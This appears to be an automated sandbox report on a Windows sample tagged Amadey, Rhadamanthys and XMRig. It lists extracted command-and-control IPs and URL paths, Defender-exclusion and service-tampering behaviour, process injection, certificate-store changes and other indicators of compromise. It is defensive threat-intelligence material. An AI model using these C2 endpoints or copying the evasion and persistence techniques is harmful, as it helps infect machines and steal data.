amadey | 9bff935ec8c2618fe262d931924c031e18eee550d9701e3cfb83c07918fd02ce

Resubmissions

28-08-2024 22:02

240828-1x98aszhnk 10

27-08-2024 12:22

240827-pjyrkazgmh 10

Analysis

max time kernel
150s
max time network
154s
platform
windows10-2004_x64
resource
win10v2004-20240802-en
resource tags

arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
submitted
28-08-2024 22:02

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Launcher.exe
Size

364KB
MD5

93fde4e38a84c83af842f73b176ab8dc
SHA1

e8c55cc160a0a94e404f544b22e38511b9d71da8
SHA256

fb07af2aead3bdf360f555fc872191e43c2f0acbfc9258435f9a30afe272ba03
SHA512

48720aebe2158b8a58fc3431c2e6f68271fbade51303ad9cb5b0493efaec6053ff0c19a898841ef7c57a3c4d042ac8e7157fb3dc79593c1dfcdcf88e1469fdec
SSDEEP

6144:MpS9kEFKbITUvR8cy8dzQ7Lcf3Si96sfO+2RZrTql9unNrkYqliwrqH1JWP6f:Mp8KLBzQ7Lcf3SiQs2FTTql9unNrkvT2

Score

10^/10

amadey rhadamanthys xmrig 3dae01 discovery evasion execution miner persistence stealer trojan upx

Malware Config

Extracted

Family

rhadamanthys

https://45.159.188.37:443/44194499adc4d2b753ee/gcj8ajmp.qnu3f

Extracted

Family

amadey

Version

4.41

Botnet

3dae01

http://185.208.158.116

http://185.209.162.226

http://89.23.103.42

Attributes

install_dir
239f17af5a
install_file
Hkbsse.exe
strings_key
91a6d9abcd7a774809c7ff7ced665178
url_paths
/hb9IvshS01/index.php

/hb9IvshS02/index.php

/hb9IvshS03/index.php

rc4.plain

Signatures

Amadey
Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.
trojan amadey
Rhadamanthys
Rhadamanthys is an info stealer written in C++ first seen in August 2022.
stealer rhadamanthys
Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs

Processes:

rhjryjyj.exe

description pid process target process

PID 2704 created 2664 2704 rhjryjyj.exe sihost.exe
xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig

description	pid	process	target process
PID 2704 created 2664	2704	rhjryjyj.exe	sihost.exe

XMRig Miner payload 9 IoCs

miner

Processes:

resource	yara_rule
behavioral5/memory/3756-224-0x0000000140000000-0x0000000140848000-memory.dmp	xmrig
behavioral5/memory/3756-223-0x0000000140000000-0x0000000140848000-memory.dmp	xmrig
behavioral5/memory/3756-226-0x0000000140000000-0x0000000140848000-memory.dmp	xmrig
behavioral5/memory/3756-229-0x0000000140000000-0x0000000140848000-memory.dmp	xmrig
behavioral5/memory/3756-228-0x0000000140000000-0x0000000140848000-memory.dmp	xmrig
behavioral5/memory/3756-227-0x0000000140000000-0x0000000140848000-memory.dmp	xmrig
behavioral5/memory/3756-230-0x0000000140000000-0x0000000140848000-memory.dmp	xmrig
behavioral5/memory/3756-238-0x0000000140000000-0x0000000140848000-memory.dmp	xmrig
behavioral5/memory/3756-239-0x0000000140000000-0x0000000140848000-memory.dmp	xmrig

Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
execution

PowerShell
T1059.001

Processes:

powershell.exepowershell.exepowershell.exepowershell.exe

pid process

1968 powershell.exe
3056 powershell.exe
4336 powershell.exe
4332 powershell.exe
Creates new service(s) 2 TTPs
persistence execution

Windows Service
T1543.003

Service Execution
T1569.002
Stops running service(s) 4 TTPs
evasion execution

Windows Service
T1543.003

Impair Defenses
T1562

Service Stop
T1489

Service Execution
T1569.002

pid	process
1968	powershell.exe
3056	powershell.exe
4336	powershell.exe
4332	powershell.exe

UPX packed file 17 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Roaming\services\2plugin27724	upx
behavioral5/memory/776-125-0x0000000140000000-0x0000000140E3D000-memory.dmp	upx
behavioral5/memory/3764-184-0x0000000140000000-0x0000000140E3D000-memory.dmp	upx
behavioral5/memory/3756-218-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral5/memory/3756-222-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral5/memory/3756-224-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral5/memory/3756-223-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral5/memory/3756-220-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral5/memory/3756-221-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral5/memory/3756-219-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral5/memory/3756-226-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral5/memory/3756-229-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral5/memory/3756-228-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral5/memory/3756-227-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral5/memory/3756-230-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral5/memory/3756-238-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral5/memory/3756-239-0x0000000140000000-0x0000000140848000-memory.dmp	upx

Legitimate hosting services abused for malware hosting/C2 1 TTPs 4 IoCs

Web Service
T1102

Processes:

flow ioc

75 raw.githubusercontent.com
76 raw.githubusercontent.com
78 bitbucket.org
79 bitbucket.org
Power Settings 1 TTPs 8 IoCs
powercfg controls all configurable power system settings on a Windows system and can be abused to prevent an infected host from locking or shutting down.
persistence

Power Settings
T1653

Processes:

powercfg.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exe

pid process

2408 powercfg.exe
4396 powercfg.exe
1036 powercfg.exe
1816 powercfg.exe
4468 powercfg.exe
1164 powercfg.exe
3616 powercfg.exe
2820 powercfg.exe

flow	ioc
75	raw.githubusercontent.com
76	raw.githubusercontent.com
78	bitbucket.org
79	bitbucket.org

pid	process
2408	powercfg.exe
4396	powercfg.exe
1036	powercfg.exe
1816	powercfg.exe
4468	powercfg.exe
1164	powercfg.exe
3616	powercfg.exe
2820	powercfg.exe

Checks computer location settings 2 TTPs 4 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

Launcher.exeLaunhcer.exeLauncher.exe3plugin29563

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-656926755-4116854191-210765258-1000\Control Panel\International\Geo\Nation	Launcher.exe
Key value queried	\REGISTRY\USER\S-1-5-21-656926755-4116854191-210765258-1000\Control Panel\International\Geo\Nation	Launhcer.exe
Key value queried	\REGISTRY\USER\S-1-5-21-656926755-4116854191-210765258-1000\Control Panel\International\Geo\Nation	Launcher.exe
Key value queried	\REGISTRY\USER\S-1-5-21-656926755-4116854191-210765258-1000\Control Panel\International\Geo\Nation	3plugin29563

Drops file in System32 directory 4 IoCs

Processes:

kuytqawknxye.exe2plugin27724powershell.exe

description	ioc	process
File opened for modification	C:\Windows\system32\MRT.exe	kuytqawknxye.exe
File opened for modification	C:\Windows\system32\MRT.exe	2plugin27724
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log	powershell.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 4 IoCs

Processes:

2plugin27724kuytqawknxye.exe

pid process

776 2plugin27724
776 2plugin27724
3764 kuytqawknxye.exe
3764 kuytqawknxye.exe

pid	process
776	2plugin27724
776	2plugin27724
3764	kuytqawknxye.exe
3764	kuytqawknxye.exe

Suspicious use of SetThreadContext 2 IoCs

Processes:

kuytqawknxye.exe

description	pid	process	target process
PID 3764 set thread context of 1660	3764	kuytqawknxye.exe	conhost.exe
PID 3764 set thread context of 3756	3764	kuytqawknxye.exe	dwm.exe

Drops file in Windows directory 1 IoCs

Processes:

3plugin29563

description ioc process

File created C:\Windows\Tasks\Hkbsse.job 3plugin29563

description	ioc	process
File created	C:\Windows\Tasks\Hkbsse.job	3plugin29563

Executes dropped EXE 14 IoCs

Processes:

Launhcer.exeLauncher.exewget.exewinrar.exerhjryjyj.exewget.exewinrar.exe2plugin27724wget.exewinrar.exe3plugin29563Hkbsse.exekuytqawknxye.exeHkbsse.exe

pid	process
2740	Launhcer.exe
2124	Launcher.exe
4008	wget.exe
776	winrar.exe
2704	rhjryjyj.exe
848	wget.exe
3040	winrar.exe
776	2plugin27724
3740	wget.exe
4240	winrar.exe
1092	3plugin29563
4852	Hkbsse.exe
3764	kuytqawknxye.exe
824	Hkbsse.exe

Launches sc.exe 14 IoCs

Sc.exe is a Windows utlilty to control services on the system.

Processes:

sc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exe

pid	process
4724	sc.exe
3692	sc.exe
3760	sc.exe
3528	sc.exe
4084	sc.exe
3468	sc.exe
3228	sc.exe
3560	sc.exe
2640	sc.exe
4980	sc.exe
692	sc.exe
1112	sc.exe
2176	sc.exe
4588	sc.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Program crash 22 IoCs

Processes:

WerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exe

pid	pid_target	process	target process
4316	2704	WerFault.exe	rhjryjyj.exe
1836	1092	WerFault.exe	3plugin29563
1764	1092	WerFault.exe	3plugin29563
1276	1092	WerFault.exe	3plugin29563
4796	1092	WerFault.exe	3plugin29563
3280	1092	WerFault.exe	3plugin29563
2236	1092	WerFault.exe	3plugin29563
4820	1092	WerFault.exe	3plugin29563
5112	1092	WerFault.exe	3plugin29563
4448	1092	WerFault.exe	3plugin29563
2732	1092	WerFault.exe	3plugin29563
3024	4852	WerFault.exe	Hkbsse.exe
1020	4852	WerFault.exe	Hkbsse.exe
400	4852	WerFault.exe	Hkbsse.exe
4468	4852	WerFault.exe	Hkbsse.exe
2704	4852	WerFault.exe	Hkbsse.exe
3320	4852	WerFault.exe	Hkbsse.exe
3520	4852	WerFault.exe	Hkbsse.exe
4008	4852	WerFault.exe	Hkbsse.exe
1504	4852	WerFault.exe	Hkbsse.exe
4708	4852	WerFault.exe	Hkbsse.exe
2516	824	WerFault.exe	Hkbsse.exe

System Location Discovery: System Language Discovery 1 TTPs 16 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

Processes:

winrar.exepowershell.exewget.exewget.execmd.exerhjryjyj.exewget.exe3plugin29563openwith.exewinrar.exepowershell.exewinrar.exeHkbsse.exeLauncher.exeLaunhcer.exeLauncher.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	winrar.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	wget.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	wget.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	rhjryjyj.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	wget.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	3plugin29563
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	openwith.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	winrar.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	winrar.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Hkbsse.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Launcher.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Launhcer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Launcher.exe

System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 3 IoCs
Adversaries may check for Internet connectivity on compromised systems.
discovery

Internet Connection Discovery
T1016.001

Processes:

wget.exewget.exewget.exe

pid process

4008 wget.exe
848 wget.exe
3740 wget.exe

pid	process
4008	wget.exe
848	wget.exe
3740	wget.exe

Modifies data under HKEY_USERS 50 IoCs

Processes:

powershell.exedwm.exe

description	ioc	process
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1"	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	dwm.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	dwm.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs	dwm.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\ROOT	dwm.exe

Modifies system certificate store 2 TTPs 5 IoCs

evasion spyware trojan

Install Root Certificate

T1553.004

Modify Registry

T1112

Processes:

Launcher.exe

description	ioc	process
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D69B561148F01C77C54578C10926DF5B856976AD\Blob = 040000000100000010000000c5dfb849ca051355ee2dba1ac33eb028030000000100000014000000d69b561148f01c77c54578c10926df5b856976ad1d000000010000001000000001728e1ecf7a9d86fb3cec8948aba9531400000001000000140000008ff04b7fa82e4524ae4d50fa639a8bdee2dd1bbc620000000100000020000000cbb522d7b7f127ad6a0113865bdf1cd4102e7d0759af635a7cf4720dc963c53b0b000000010000003000000047006c006f00620061006c005300690067006e00200052006f006f00740020004300410020002d002000520033000000530000000100000040000000303e301f06092b06010401a032010130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b060105050703080f00000001000000200000005229ba15b31b0c6f4cca89c2985177974327d1b689a3b935a0bd975532af22ab2000000001000000630300003082035f30820247a003020102020b04000000000121585308a2300d06092a864886f70d01010b0500304c3120301e060355040b1317476c6f62616c5369676e20526f6f74204341202d20523331133011060355040a130a476c6f62616c5369676e311330110603550403130a476c6f62616c5369676e301e170d3039303331383130303030305a170d3239303331383130303030305a304c3120301e060355040b1317476c6f62616c5369676e20526f6f74204341202d20523331133011060355040a130a476c6f62616c5369676e311330110603550403130a476c6f62616c5369676e30820122300d06092a864886f70d01010105000382010f003082010a0282010100cc2576907906782216f5c083b684ca289efd057611c5ad8872fc460243c7b28a9d045f24cb2e4be1608246e152ab0c8147706cdd64d1ebf52ca30f823d0c2bae97d7b614861079bb3b1380778c08e149d26a622f1f5efa9668df892795389f06d73ec9cb26590d73deb0c8e9260e8315c6ef5b8bd20460ca49a628f6693bf6cbc82891e59d8a615737ac7414dc74e03aee722f2e9cfbd0bbbff53d00e10633e8822bae53a63a16738cdd410e203ac0b4a7a1e9b24f902e3260e957cbb904926868e538266075b29f77ff9114efae2049fcad401548d1023161195eb897efad77b7649a7abf5fc113ef9b62fb0d6ce0546916a903da6ee983937176c6698582170203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e041604148ff04b7fa82e4524ae4d50fa639a8bdee2dd1bbc300d06092a864886f70d01010b050003820101004b40dbc050aafec80ceff796544549bb96000941acb3138686280733ca6be674b9ba002daea40ad3f5f1f10f8abf73674a83c7447b78e0af6e6c6f03298e333945c38ee4b9576caafc1296ec53c62de4246cb99463fbdc536867563e83b8cf3521c3c968fecedac253aacc908ae9f05d468c95dd7a58281a2f1ddecd0037418fed446dd75328977ef367041e15d78a96b4d3de4c27a44c1b737376f41799c21f7a0ee32d08ad0a1c2cff3cab550e0f917e36ebc35749bee12e2d7c608bc3415113239dcef7326b9401a899e72c331f3a3b25d28640ce3b2c8678c9612f14baeedb556fdf84ee05094dbd28d872ced36250651eeb92978331d9b3b5ca47583f5f	Launcher.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D69B561148F01C77C54578C10926DF5B856976AD\Blob = 190000000100000010000000d0fd3c9c380d7b65e26b9a3fedd39b8f0f00000001000000200000005229ba15b31b0c6f4cca89c2985177974327d1b689a3b935a0bd975532af22ab090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b06010505070308530000000100000040000000303e301f06092b06010401a032010130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00b000000010000003000000047006c006f00620061006c005300690067006e00200052006f006f00740020004300410020002d002000520033000000620000000100000020000000cbb522d7b7f127ad6a0113865bdf1cd4102e7d0759af635a7cf4720dc963c53b1400000001000000140000008ff04b7fa82e4524ae4d50fa639a8bdee2dd1bbc1d000000010000001000000001728e1ecf7a9d86fb3cec8948aba953030000000100000014000000d69b561148f01c77c54578c10926df5b856976ad040000000100000010000000c5dfb849ca051355ee2dba1ac33eb0282000000001000000630300003082035f30820247a003020102020b04000000000121585308a2300d06092a864886f70d01010b0500304c3120301e060355040b1317476c6f62616c5369676e20526f6f74204341202d20523331133011060355040a130a476c6f62616c5369676e311330110603550403130a476c6f62616c5369676e301e170d3039303331383130303030305a170d3239303331383130303030305a304c3120301e060355040b1317476c6f62616c5369676e20526f6f74204341202d20523331133011060355040a130a476c6f62616c5369676e311330110603550403130a476c6f62616c5369676e30820122300d06092a864886f70d01010105000382010f003082010a0282010100cc2576907906782216f5c083b684ca289efd057611c5ad8872fc460243c7b28a9d045f24cb2e4be1608246e152ab0c8147706cdd64d1ebf52ca30f823d0c2bae97d7b614861079bb3b1380778c08e149d26a622f1f5efa9668df892795389f06d73ec9cb26590d73deb0c8e9260e8315c6ef5b8bd20460ca49a628f6693bf6cbc82891e59d8a615737ac7414dc74e03aee722f2e9cfbd0bbbff53d00e10633e8822bae53a63a16738cdd410e203ac0b4a7a1e9b24f902e3260e957cbb904926868e538266075b29f77ff9114efae2049fcad401548d1023161195eb897efad77b7649a7abf5fc113ef9b62fb0d6ce0546916a903da6ee983937176c6698582170203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e041604148ff04b7fa82e4524ae4d50fa639a8bdee2dd1bbc300d06092a864886f70d01010b050003820101004b40dbc050aafec80ceff796544549bb96000941acb3138686280733ca6be674b9ba002daea40ad3f5f1f10f8abf73674a83c7447b78e0af6e6c6f03298e333945c38ee4b9576caafc1296ec53c62de4246cb99463fbdc536867563e83b8cf3521c3c968fecedac253aacc908ae9f05d468c95dd7a58281a2f1ddecd0037418fed446dd75328977ef367041e15d78a96b4d3de4c27a44c1b737376f41799c21f7a0ee32d08ad0a1c2cff3cab550e0f917e36ebc35749bee12e2d7c608bc3415113239dcef7326b9401a899e72c331f3a3b25d28640ce3b2c8678c9612f14baeedb556fdf84ee05094dbd28d872ced36250651eeb92978331d9b3b5ca47583f5f	Launcher.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D69B561148F01C77C54578C10926DF5B856976AD\Blob = 5c000000010000000400000000080000040000000100000010000000c5dfb849ca051355ee2dba1ac33eb028030000000100000014000000d69b561148f01c77c54578c10926df5b856976ad1d000000010000001000000001728e1ecf7a9d86fb3cec8948aba9531400000001000000140000008ff04b7fa82e4524ae4d50fa639a8bdee2dd1bbc620000000100000020000000cbb522d7b7f127ad6a0113865bdf1cd4102e7d0759af635a7cf4720dc963c53b0b000000010000003000000047006c006f00620061006c005300690067006e00200052006f006f00740020004300410020002d002000520033000000530000000100000040000000303e301f06092b06010401a032010130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b060105050703080f00000001000000200000005229ba15b31b0c6f4cca89c2985177974327d1b689a3b935a0bd975532af22ab190000000100000010000000d0fd3c9c380d7b65e26b9a3fedd39b8f2000000001000000630300003082035f30820247a003020102020b04000000000121585308a2300d06092a864886f70d01010b0500304c3120301e060355040b1317476c6f62616c5369676e20526f6f74204341202d20523331133011060355040a130a476c6f62616c5369676e311330110603550403130a476c6f62616c5369676e301e170d3039303331383130303030305a170d3239303331383130303030305a304c3120301e060355040b1317476c6f62616c5369676e20526f6f74204341202d20523331133011060355040a130a476c6f62616c5369676e311330110603550403130a476c6f62616c5369676e30820122300d06092a864886f70d01010105000382010f003082010a0282010100cc2576907906782216f5c083b684ca289efd057611c5ad8872fc460243c7b28a9d045f24cb2e4be1608246e152ab0c8147706cdd64d1ebf52ca30f823d0c2bae97d7b614861079bb3b1380778c08e149d26a622f1f5efa9668df892795389f06d73ec9cb26590d73deb0c8e9260e8315c6ef5b8bd20460ca49a628f6693bf6cbc82891e59d8a615737ac7414dc74e03aee722f2e9cfbd0bbbff53d00e10633e8822bae53a63a16738cdd410e203ac0b4a7a1e9b24f902e3260e957cbb904926868e538266075b29f77ff9114efae2049fcad401548d1023161195eb897efad77b7649a7abf5fc113ef9b62fb0d6ce0546916a903da6ee983937176c6698582170203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e041604148ff04b7fa82e4524ae4d50fa639a8bdee2dd1bbc300d06092a864886f70d01010b050003820101004b40dbc050aafec80ceff796544549bb96000941acb3138686280733ca6be674b9ba002daea40ad3f5f1f10f8abf73674a83c7447b78e0af6e6c6f03298e333945c38ee4b9576caafc1296ec53c62de4246cb99463fbdc536867563e83b8cf3521c3c968fecedac253aacc908ae9f05d468c95dd7a58281a2f1ddecd0037418fed446dd75328977ef367041e15d78a96b4d3de4c27a44c1b737376f41799c21f7a0ee32d08ad0a1c2cff3cab550e0f917e36ebc35749bee12e2d7c608bc3415113239dcef7326b9401a899e72c331f3a3b25d28640ce3b2c8678c9612f14baeedb556fdf84ee05094dbd28d872ced36250651eeb92978331d9b3b5ca47583f5f	Launcher.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D69B561148F01C77C54578C10926DF5B856976AD	Launcher.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D69B561148F01C77C54578C10926DF5B856976AD\Blob = 0f00000001000000200000005229ba15b31b0c6f4cca89c2985177974327d1b689a3b935a0bd975532af22ab090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b06010505070308530000000100000040000000303e301f06092b06010401a032010130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00b000000010000003000000047006c006f00620061006c005300690067006e00200052006f006f00740020004300410020002d002000520033000000620000000100000020000000cbb522d7b7f127ad6a0113865bdf1cd4102e7d0759af635a7cf4720dc963c53b1400000001000000140000008ff04b7fa82e4524ae4d50fa639a8bdee2dd1bbc1d000000010000001000000001728e1ecf7a9d86fb3cec8948aba953030000000100000014000000d69b561148f01c77c54578c10926df5b856976ad2000000001000000630300003082035f30820247a003020102020b04000000000121585308a2300d06092a864886f70d01010b0500304c3120301e060355040b1317476c6f62616c5369676e20526f6f74204341202d20523331133011060355040a130a476c6f62616c5369676e311330110603550403130a476c6f62616c5369676e301e170d3039303331383130303030305a170d3239303331383130303030305a304c3120301e060355040b1317476c6f62616c5369676e20526f6f74204341202d20523331133011060355040a130a476c6f62616c5369676e311330110603550403130a476c6f62616c5369676e30820122300d06092a864886f70d01010105000382010f003082010a0282010100c